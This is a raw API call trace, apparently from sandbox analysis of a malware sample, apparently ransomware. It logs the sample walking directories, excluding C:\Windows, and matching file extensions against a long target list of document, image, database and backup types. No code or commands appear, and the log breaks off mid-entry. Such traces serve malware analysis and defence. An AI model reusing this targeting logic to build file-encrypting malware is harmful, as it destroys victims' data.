[0034.917] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".3gp") returned 4 [0034.917] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".7z") returned 3 [0034.917] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0034.917] lstrlenW (lpString=".accda") returned 6 [0034.917] lstrcmpiW (lpString1=".accda", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".accdb") returned 6 [0034.917] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".accdc") returned 6 [0034.917] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".accde") returned 6 [0034.917] lstrcmpiW (lpString1=".accde", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".accdt") returned 6 [0034.917] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".accdw") returned 6 [0034.917] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".adb") returned 4 [0034.917] lstrcmpiW (lpString1=".adb", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".adp") returned 4 [0034.917] lstrcmpiW (lpString1=".adp", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".ai") returned 3 [0034.917] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1 [0034.917] lstrlenW (lpString=".ai3") returned 4 [0034.917] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".ai4") returned 4 [0034.917] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".ai5") returned 4 [0034.917] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1 [0034.917] lstrlenW (lpString=".ai6") returned 4 [0034.918] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1 [0034.918] lstrlenW (lpString=".ai7") returned 4 [0034.918] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1 [0034.918] lstrlenW (lpString=".ai8") returned 4 [0034.918] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1 [0034.918] lstrlenW (lpString=".anim") returned 5 [0034.918] lstrcmpiW (lpString1=".anim", lpString2="") returned 1 [0034.918] lstrlenW (lpString=".arw") returned 4 [0034.918] lstrcmpiW (lpString1=".arw", lpString2="") returned 1 [0034.918] lstrlenW (lpString=".as") returned 3 [0034.918] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1 [0034.918] lstrlenW (lpString=".asa") returned 4 [0034.918] lstrcmpiW (lpString1=".asa", lpString2="") returned 1 [0049.700] FindNextFileW (in: hFindFile=0x4232358, lpFindFileData=0x3faf310 | out: lpFindFileData=0x3faf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.717] FindNextFileW (in: hFindFile=0x4232358, lpFindFileData=0x3faf310 | out: lpFindFileData=0x3faf310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x252bcdd, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x252bcdd, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0xab6cf35d, ftLastWriteTime.dwHighDateTime=0x1ca03fd, nFileSizeHigh=0x0, nFileSizeLow=0x3912, dwReserved0=0x0, dwReserved1=0x0, cFileName="adojavas.inc", cAlternateFileName="")) returned 1 [0056.045] FindNextFileW (in: hFindFile=0x4232218, lpFindFileData=0x3faf808 | out: lpFindFileData=0x3faf808*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.046] FindNextFileW (in: hFindFile=0x4232218, lpFindFileData=0x3faf808 | out: lpFindFileData=0x3faf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="42D5BEC7DDFBD49E76467529CBC2868987BF8460", cAlternateFileName="42D5BE~1")) returned 1 [0056.046] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned 1 [0056.046] lstrcmpiW (lpString1="C:\\Windows", lpString2="42D5BEC7DDFBD49E76467529CBC2868987BF8460") returned 1 [0056.046] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x4a10048 [0056.046] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*", lpFindFileData=0x3faf58c | out: lpFindFileData=0x3faf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232298 [0056.046] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x3faf58c | out: lpFindFileData=0x3faf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.046] FindNextFileW (in: hFindFile=0x4232298, lpFindFileData=0x3faf58c | out: lpFindFileData=0x3faf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0056.046] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned 1 [0056.047] lstrcmpiW (lpString1="C:\\Windows", lpString2="packages") returned -1 [0056.047] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x4a20050 [0056.047] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*", lpFindFileData=0x3faf310 | out: lpFindFileData=0x3faf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4232358 [0056.047] FindNextFileW (in: hFindFile=0x4232358, lpFindFileData=0x3faf310 | out: lpFindFileData=0x3faf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.047] FindNextFileW (in: hFindFile=0x4232358, lpFindFileData=0x3faf310 | out: lpFindFileData=0x3faf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 1 [0056.047] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch") returned 1 [0056.047] lstrcmpiW (lpString1="C:\\Windows", lpString2="Patch") returned -1 [0056.047] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x4a30058 [0056.047] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\*", lpFindFileData=0x3faf094 | out: lpFindFileData=0x3faf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42323d8 [0056.048] FindNextFileW (in: hFindFile=0x42323d8, lpFindFileData=0x3faf094 | out: lpFindFileData=0x3faf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.048] FindNextFileW (in: hFindFile=0x42323d8, lpFindFileData=0x3faf094 | out: lpFindFileData=0x3faf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 1 [0056.048] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64") returned 1 [0056.048] lstrcmpiW (lpString1="C:\\Windows", lpString2="x64") returned -1 [0056.048] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0xfffe) returned 0x4a40060 [0056.048] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\*", lpFindFileData=0x3faee18 | out: lpFindFileData=0x3faee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42320d8 [0056.048] FindNextFileW (in: hFindFile=0x42320d8, lpFindFileData=0x3faee18 | out: lpFindFileData=0x3faee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.048] FindNextFileW (in: hFindFile=0x42320d8, lpFindFileData=0x3faee18 | out: lpFindFileData=0x3faee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59d2100, ftCreationTime.dwHighDateTime=0x1d0a100, ftLastAccessTime.dwLowDateTime=0x59d2100, ftLastAccessTime.dwHighDateTime=0x1d0a100, ftLastWriteTime.dwLowDateTime=0x59d2100, ftLastWriteTime.dwHighDateTime=0x1d0a100, nFileSizeHigh=0x0, nFileSizeLow=0xf7139, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0056.048] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0056.048] lstrcmpiW (lpString1=".3ds", lpString2=".msu") returned -1 [0056.049] lstrcmpiW (lpString1=".3fr", lpString2=".msu") returned -1 [0056.049] lstrcmpiW (lpString1=".3g2", lpString2=".msu") returned -1 [0056.049] lstrcmpiW (lpString1=".3gp", lpString2=".msu") returned -1 [0056.049] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0056.049] lstrcmpiW (lpString1=".accda", lpString2="64.msu") returned -1 [0056.049] lstrcmpiW (lpString1=".accdb", lpString2="64.msu") returned -1 [0056.049] lstrcmpiW (lpString1=".accdc", lpString2="64.msu") returned -1 [0056.049] lstrcmpiW (lpString1=".accde", lpString2="64.msu") returned -1 [0056.049] lstrcmpiW (lpString1=".accdt", lpString2="64.msu") returned -1 [0056.049] lstrcmpiW (lpString1=".accdw", lpString2="64.msu") returned -1 [0056.049] lstrcmpiW (lpString1=".adb", lpString2=".msu") returned -1 [0056.049] lstrcmpiW (lpString1=".adp", lpString2=".msu") returned -1 [0056.049] lstrcmpiW (lpString1=".ai", lpString2="msu") returned -1 [0056.050] lstrcmpiW (lpString1=".ai3", lpString2=".msu") returned -1 [0056.050] lstrcmpiW (lpString1=".ai4", lpString2=".msu") returned -1 [0056.050] lstrcmpiW (lpString1=".ai5", lpString2=".msu") returned -1 [0056.050] lstrcmpiW (lpString1=".ai6", lpString2=".msu") returned -1 [0056.050] lstrcmpiW (lpString1=".ai7", lpString2=".msu") returned -1 [0056.050] lstrcmpiW (lpString1=".ai8", lpString2=".msu") returned -1 [0056.050] lstrcmpiW (lpString1=".anim", lpString2="4.msu") returned -1 [0056.050] lstrcmpiW (lpString1=".arw", lpString2=".msu") returned -1 [0056.050] lstrcmpiW (lpString1=".as", lpString2="msu") returned -1 [0056.050] lstrcmpiW (lpString1=".asa", lpString2=".msu") returned -1 [0056.050] lstrcmpiW (lpString1=".asc", lpString2=".msu") returned -1 [0056.050] lstrcmpiW (lpString1=".ascx", lpString2="4.msu") returned -1 [0056.051] lstrcmpiW (lpString1=".asm", lpString2=".msu") returned -1 [0056.051] lstrcmpiW (lpString1=".asmx", lpString2="4.msu") returned -1 [0056.051] lstrcmpiW (lpString1=".asp", lpString2=".msu") returned -1 [0056.051] lstrcmpiW (lpString1=".aspx", lpString2="4.msu") returned -1 [0056.051] lstrcmpiW (lpString1=".asr", lpString2=".msu") returned -1 [0056.051] lstrcmpiW (lpString1=".asx", lpString2=".msu") returned -1 [0056.051] lstrcmpiW (lpString1=".avi", lpString2=".msu") returned -1 [0056.051] lstrcmpiW (lpString1=".avs", lpString2=".msu") returned -1 [0056.051] lstrcmpiW (lpString1=".backup", lpString2="x64.msu") returned -1 [0056.051] lstrcmpiW (lpString1=".bak", lpString2=".msu") returned -1 [0056.051] lstrcmpiW (lpString1=".bay", lpString2=".msu") returned -1 [0056.051] lstrcmpiW (lpString1=".bd", lpString2="msu") returned -1 [0056.051] lstrcmpiW (lpString1=".bin", lpString2=".msu") returned -1 [0056.052] lstrcmpiW (lpString1=".bmp", lpString2=".msu") returned -1 [0056.052] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0056.052] lstrcmpiW (lpString1=".c", lpString2="su") returned -1 [0056.052] lstrcmpiW (lpString1=".cdr", lpString2=".msu") returned -1 [0056.052] lstrcmpiW (lpString1=".cer", lpString2=".msu") returned -1 [0056.052] lstrcmpiW (lpString1=".cf", lpString2="msu") returned -1 [0056.052] lstrcmpiW (lpString1=".cfc", lpString2=".msu") returned -1 [0056.052] lstrcmpiW (lpString1=".cfm", lpString2=".msu") returned -1 [0056.052] lstrcmpiW (lpString1=".cfml", lpString2="4.msu") returned -1 [0056.052] lstrcmpiW (lpString1=".cfu", lpString2=".msu") returned -1 [0056.052] lstrcmpiW (lpString1=".chm", lpString2=".msu") returned -1 [0056.052] lstrcmpiW (lpString1=".cin", lpString2=".msu") returned -1 [0056.054] lstrcmpiW (lpString1=".class", lpString2="64.msu") returned -1 [0056.054] lstrcmpiW (lpString1=".clx", lpString2=".msu") returned -1 [0056.054] lstrcmpiW (lpString1=".config", lpString2="x64.msu") returned -1 [0056.054] lstrcmpiW (lpString1=".cpp", lpString2=".msu") returned -1 [0056.054] lstrcmpiW (lpString1=".cr2", lpString2=".msu") returned -1 [0056.054] lstrcmpiW (lpString1=".crt", lpString2=".msu") returned -1 [0056.054] lstrcmpiW (lpString1=".crw", lpString2=".msu") returned -1 [0056.054] lstrcmpiW (lpString1=".cs", lpString2="msu") returned -1 [0056.054] lstrcmpiW (lpString1=".css", lpString2=".msu") returned -1 [0056.054] lstrcmpiW (lpString1=".csv", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".cub", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".dae", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".dat", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".db", lpString2="msu") returned -1 [0056.055] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".dbx", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".dc3", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".dcm", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".dcr", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".der", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".dib", lpString2=".msu") returned -1 [0056.055] lstrcmpiW (lpString1=".dic", lpString2=".msu") returned -1 [0056.056] lstrcmpiW (lpString1=".dif", lpString2=".msu") returned -1 [0056.056] lstrcmpiW (lpString1=".divx", lpString2="4.msu") returned -1 [0056.056] lstrcmpiW (lpString1=".djvu", lpString2="4.msu") returned -1 [0056.056] lstrcmpiW (lpString1=".dng", lpString2=".msu") returned -1 [0056.056] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0056.056] lstrcmpiW (lpString1=".docm", lpString2="4.msu") returned -1 [0056.056] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0056.056] lstrcmpiW (lpString1=".dot", lpString2=".msu") returned -1 [0056.056] lstrcmpiW (lpString1=".dotm", lpString2="4.msu") returned -1 [0056.056] lstrcmpiW (lpString1=".dotx", lpString2="4.msu") returned -1 [0056.056] lstrcmpiW (lpString1=".dpx", lpString2=".msu") returned -1 [0056.056] lstrcmpiW (lpString1=".dqy", lpString2=".msu") returned -1 [0056.056] lstrcmpiW (lpString1=".dsn", lpString2=".msu") returned -1 [0056.056] lstrcmpiW (lpString1=".dt", lpString2="msu") returned -1 [0056.057] lstrcmpiW (lpString1=".dtd", lpString2=".msu") returned -1 [0056.057] lstrcmpiW (lpString1=".dwg", lpString2=".msu") returned -1 [0056.057] lstrcmpiW (lpString1=".dwt", lpString2=".msu") returned -1 [0056.057] lstrcmpiW (lpString1=".dx", lpString2="msu") returned -1 [0056.057] lstrcmpiW (lpString1=".dxf", lpString2=".msu") returned -1 [0056.057] lstrcmpiW (lpString1=".edml", lpString2="4.msu") returned -1 [0056.057] lstrcmpiW (lpString1=".efd", lpString2=".msu") returned -1 [0056.057] lstrcmpiW (lpString1=".elf", lpString2=".msu") returned -1 [0056.057] lstrcmpiW (lpString1=".emf", lpString2=".msu") returned -1 [0056.057] lstrcmpiW (lpString1=".emz", lpString2=".msu") returned -1 [0056.057] lstrcmpiW (lpString1=".epf", lpString2=".msu") returned -1 [0056.057] lstrcmpiW (lpString1=".eps", lpString2=".msu") returned -1 [0056.057] lstrcmpiW (lpString1=".epsf", lpString2="4.msu") returned -1 [0056.058] lstrcmpiW (lpString1=".epsp", lpString2="4.msu") returned -1 [0056.058] lstrcmpiW (lpString1=".erf", lpString2=".msu") returned -1 [0056.058] lstrcmpiW (lpString1=".exr", lpString2=".msu") returned -1 [0056.058] lstrcmpiW (lpString1=".f4v", lpString2=".msu") returned -1 [0056.058] lstrcmpiW (lpString1=".fido", lpString2="4.msu") returned -1 [0056.058] lstrcmpiW (lpString1=".flm", lpString2=".msu") returned -1 [0056.058] lstrcmpiW (lpString1=".flv", lpString2=".msu") returned -1 [0056.058] lstrcmpiW (lpString1=".frm", lpString2=".msu") returned -1 [0056.058] lstrcmpiW (lpString1=".fxg", lpString2=".msu") returned -1 [0056.058] lstrcmpiW (lpString1=".geo", lpString2=".msu") returned -1 [0056.058] lstrcmpiW (lpString1=".gif", lpString2=".msu") returned -1 [0056.058] lstrcmpiW (lpString1=".grs", lpString2=".msu") returned -1 [0056.058] lstrcmpiW (lpString1=".gz", lpString2="msu") returned -1 [0056.059] lstrcmpiW (lpString1=".h", lpString2="su") returned -1 [0056.059] lstrcmpiW (lpString1=".hdr", lpString2=".msu") returned -1 [0056.059] lstrcmpiW (lpString1=".hpp", lpString2=".msu") returned -1 [0056.059] lstrcmpiW (lpString1=".hta", lpString2=".msu") returned -1 [0056.059] lstrcmpiW (lpString1=".htc", lpString2=".msu") returned -1 [0056.059] lstrcmpiW (lpString1=".htm", lpString2=".msu") returned -1 [0056.059] lstrcmpiW (lpString1=".html", lpString2="4.msu") returned -1 [0056.059] lstrcmpiW (lpString1=".icb", lpString2=".msu") returned -1 [0056.059] lstrcmpiW (lpString1=".ics", lpString2=".msu") returned -1 [0056.059] lstrcmpiW (lpString1=".iff", lpString2=".msu") returned -1 [0056.059] lstrcmpiW (lpString1=".inc", lpString2=".msu") returned -1 [0056.059] lstrcmpiW (lpString1=".indd", lpString2="4.msu") returned -1 [0056.059] lstrcmpiW (lpString1=".ini", lpString2=".msu") returned -1 [0056.060] lstrcmpiW (lpString1=".iqy", lpString2=".msu") returned -1 [0056.060] lstrcmpiW (lpString1=".j2c", lpString2=".msu") returned -1 [0056.060] lstrcmpiW (lpString1=".j2k", lpString2=".msu") returned -1 [0056.060] lstrcmpiW (lpString1=".java", lpString2="4.msu") returned -1 [0056.060] lstrcmpiW (lpString1=".jp2", lpString2=".msu") returned -1 [0056.060] lstrcmpiW (lpString1=".jpc", lpString2=".msu") returned -1 [0056.060] lstrcmpiW (lpString1=".jpe", lpString2=".msu") returned -1 [0056.060] lstrcmpiW (lpString1=".jpeg", lpString2="4.msu") returned -1 [0056.060] lstrcmpiW (lpString1=".jpf", lpString2=".msu") returned -1 [0056.060] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0056.060] lstrcmpiW (lpString1=".jpx", lpString2=".msu") returned -1 [0056.060] lstrcmpiW (lpString1=".js", lpString2="msu") returned -1 [0056.060] lstrcmpiW (lpString1=".jsf", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".json", lpString2="4.msu") returned -1 [0056.061] lstrcmpiW (lpString1=".jsp", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".kdc", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".kmz", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".kwm", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".lasso", lpString2="64.msu") returned -1 [0056.061] lstrcmpiW (lpString1=".lbi", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".lgf", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".lgp", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".log", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".m1v", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".m4a", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".m4v", lpString2=".msu") returned -1 [0056.061] lstrcmpiW (lpString1=".max", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".md", lpString2="msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mda", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mdb", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mde", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mdf", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mdw", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mef", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mft", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mfw", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mht", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mhtml", lpString2="64.msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mka", lpString2=".msu") returned -1 [0056.062] lstrcmpiW (lpString1=".mkidx", lpString2="64.msu") returned -1 [0056.063] lstrcmpiW (lpString1=".mkv", lpString2=".msu") returned -1 [0056.063] lstrcmpiW (lpString1=".mos", lpString2=".msu") returned -1 [0056.063] lstrcmpiW (lpString1=".mov", lpString2=".msu") returned -1 [0056.063] lstrcmpiW (lpString1=".mp3", lpString2=".msu") returned -1 [0056.063] lstrcmpiW (lpString1=".mp4", lpString2=".msu") returned -1 [0056.063] lstrcmpiW (lpString1=".mpeg", lpString2="4.msu") returned -1 [0056.063] lstrcmpiW (lpString1=".mpg", lpString2=".msu") returned -1 [0056.063] lstrcmpiW (lpString1=".mpv", lpString2=".msu") returned -1 [0056.063] lstrcmpiW (lpString1=".mrw", lpString2=".msu") returned -1 [0056.063] lstrcmpiW (lpString1=".msg", lpString2=".msu") returned -1 [0056.063] lstrcmpiW (lpString1=".mxl", lpString2=".msu") returned 1 [0056.063] lstrcmpiW (lpString1=".myd", lpString2=".msu") returned 1 [0056.063] lstrcmpiW (lpString1=".myi", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".nef", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".nrw", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".obj", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".odb", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".odc", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".odm", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".odp", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".ods", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".oft", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".one", lpString2=".msu") returned 1 [0056.064] lstrcmpiW (lpString1=".onepkg", lpString2="x64.msu") returned -1 [0056.064] lstrcmpiW (lpString1=".onetoc2", lpString2="-x64.msu") returned -1 [0056.064] lstrcmpiW (lpString1=".opt", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".oqy", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".orf", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".p12", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".p7b", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".p7c", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".pam", lpString2=".msu") returned 1 [0056.065] lstrcmpiW (lpString1=".pbm", lpString2=".msu") returned 1 [0056.065] 